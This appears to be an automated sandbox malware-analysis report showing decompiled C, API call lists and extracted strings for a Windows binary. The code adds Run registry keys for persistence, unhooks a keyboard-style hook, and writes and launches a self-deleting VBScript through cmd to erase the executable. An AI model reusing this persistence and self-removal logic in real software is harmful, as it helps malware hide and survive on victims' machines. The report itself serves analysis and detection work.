                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                  • exit.MSVCRT ref: 00408980
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1819783940-1536747724
                                  • Opcode ID: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                  • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                  • Opcode Fuzzy Hash: 5d84789943ac91f38d4bcb19be325d2da9fe4f3b99244500e455f64aba4d7c7c
                                  • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 19%
                                  			E00408245() {
                                  				char _v0;
                                  				signed int _v5;
                                  				char _v6;
                                  				signed int _v9;
                                  				char _v10;
                                  				char _v24;
                                  				char _v28;
                                  				char _v40;
                                  				char _v44;
                                  				char _v56;
                                  				char _v60;
                                  				char _v72;
                                  				char _v76;
                                  				char _v88;
                                  				char _v92;
                                  				void* _v108;
                                  				void* _v124;
                                  				void _v606;
                                  				short _v608;
                                  				short _v644;
                                  				void* _t112;
                                  				void* _t114;
                                  				char* _t116;
                                  				WCHAR* _t118;
                                  				signed char _t120;
                                  				char* _t121;
                                  				char* _t123;
                                  				char* _t126;
                                  				char* _t127;
                                  				char* _t128;
                                  				short* _t131;
                                  				void* _t132;
                                  				char* _t134;
                                  				WCHAR* _t137;
                                  				char* _t138;
                                  				char* _t140;
                                  				char* _t143;
                                  				char* _t144;
                                  				char* _t145;
                                  				char* _t146;
                                  				signed int* _t148;
                                  				char* _t149;
                                  				char* _t150;
                                  				signed int _t151;
                                  				short* _t153;
                                  				char* _t154;
                                  				char* _t155;
                                  				WCHAR* _t157;
                                  				char* _t158;
                                  				char* _t159;
                                  				char* _t163;
                                  				WCHAR* _t165;
                                  				char* _t166;
                                  				char* _t167;
                                  				intOrPtr* _t174;
                                  				short* _t285;
                                  				void* _t297;
                                  				void* _t299;
                                  				void* _t301;
                                  				void* _t303;
                                  				void* _t304;
                                  				void* _t305;
                                  				void* _t306;
                                  				void* _t308;
                                  				void* _t310;
                                  
                                  				_t112 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t112 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t112 = E0041050F(_t112);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E00412BEE(_t112);
                                  				}
                                  				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t112 = E0040B9E8(0x80000002, _t172, _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
                                  					_t297 = _t297 + 0xc;
                                  				}
                                  				_v608 = _v608 & 0x00000000;
                                  				_t114 = memset( &_v606, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
                                  				_t299 = _t297 + 0x28;
                                  				if(_t116 == 0) {
                                  					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t116);
                                  				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
                                  				_v5 = 1;
                                  				_t118 =  *_t174(0x41bc68, 0x415800);
                                  				if(_t118 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t118, 0x80);
                                  				}
                                  				_t120 = SetFileAttributesW( &_v608, 0x80);
                                  				if(_t120 == 0) {
                                  					_v5 = _v5 & _t120;
                                  				}
                                  				_t121 =  &_v6;
                                  				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
                                  				_t123 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
                                  				L0041416A();
                                  				_t301 = _t299 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
                                  				if(_v5 != 0) {
                                  					_t165 =  &_v608;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
                                  					_t166 =  &_v72;
                                  					L0041416A();
                                  					_t167 =  &_v40;
                                  					L00414146();
                                  					_t301 = _t301 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t126 =  &_v6;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
                                  				_t127 =  &_v72;
                                  				L00414146();
                                  				_t128 =  &_v56;
                                  				L00414146();
                                  				_t303 = _t301 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v5 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				_push(0x415800);
                                  				_push(0x41bc68);
                                  				if( *_t174() != 0) {
                                  					_t163 =  &_v72;
                                  					L0041416A();
                                  					_t129 =  &_v56;
                                  					L00414146();
                                  					_t303 = _t303 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
                                  				_t304 = _t303 + 0x10;
                                  				if(_t131 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
                                  				}
                                  				exit(0);
                                  				_pop(_t280);
                                  				_pop(_t291);
                                  				_pop(_t175);
                                  				_t305 = _t304 - 0x27c;
                                  				_t132 = E0040AC8C();
                                  				if( *0x41b154 != 0x30) {
                                  					_t132 = E00406D41(0x41b900);
                                  				}
                                  				if( *0x41c118 == 1) {
                                  					_t132 = E0041050F(_t132);
                                  				}
                                  				if( *0x41b22a != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E00412BEE(_t132);
                                  				}
                                  				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
                                  				if( *0x41ba58 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				if( *0x41bc64 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000002, _t176, _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				if( *0x41ba20 == 1) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
                                  					_t305 = _t305 + 0xc;
                                  				}
                                  				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
                                  				_t306 = _t305 + 0x1c;
                                  				if(_t134 == 0) {
                                  					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
                                  				}
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				RegDeleteKeyA(0x80000001, _t134);
                                  				_v9 = 1;
                                  				_t137 = SetFileAttributesW( &_v644, 0x80);
                                  				if(_t137 == 0) {
                                  					_v9 = _v9 & _t137;
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t137 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					SetFileAttributesW(_t137, 0x80);
                                  				}
                                  				_t138 =  &_v10;
                                  				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
                                  				L00414146();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
                                  				_t140 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
                                  				L0041416A();
                                  				_t308 = _t306 + 0x18;
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
                                  				if(_v9 != 0) {
                                  					_t157 =  &_v644;
                                  					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
                                  					_t158 =  &_v76;
                                  					L0041416A();
                                  					_t159 =  &_v28;
                                  					L00414146();
                                  					_t308 = _t308 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t285 = L"\"\n";
                                  				_t143 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
                                  				_t144 =  &_v76;
                                  				L00414146();
                                  				_t145 =  &_v60;
                                  				L00414146();
                                  				_t310 = _t308 + 0x18;
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				if(_v9 != 0) {
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
                                  				}
                                  				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
                                  				if(_t145 != 0) {
                                  					_t154 =  &_v76;
                                  					L0041416A();
                                  					_t155 =  &_v60;
                                  					L00414146();
                                  					_t310 = _t310 + 0x18;
                                  					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				}
                                  				_t146 =  &_v10;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
                                  				_t148 =  &_v9;
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
                                  				_t149 =  &_v28;
                                  				L0041414C();
                                  				_t150 =  &_v76;
                                  				L0041414C();
                                  				_t151 =  &_v60;
                                  				L00414146();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
                                  				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
                                  				if(_t153 != 0) {
                                  					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                  					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
                                  					if(_t153 > 0x20) {
                                  						exit(0);
                                  					}
                                  				}
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                  				return _t153;
                                  			}

                                  Instruction address column (decompiler listing for the function above): 0x0040824e to 0x004089a5

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00408282
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082AC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082C8
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 004082E8
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,80000001,004166F0), ref: 00408321
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040832A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000208,00000000), ref: 0040834A
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408368
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00408370
                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 00408378
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408394
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 004083A6
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 004083AD
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004083BF
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 004083DA
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004083E5
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004083F0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083FB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 0040840D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 0040841D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408428
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 00408447
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 00408457
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408464
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408470
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408479
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408482
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040848B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004084A9
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084B4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004084C1
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004084CD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084D6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084DF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004084E8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                  • exit.MSVCRT ref: 004085A3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
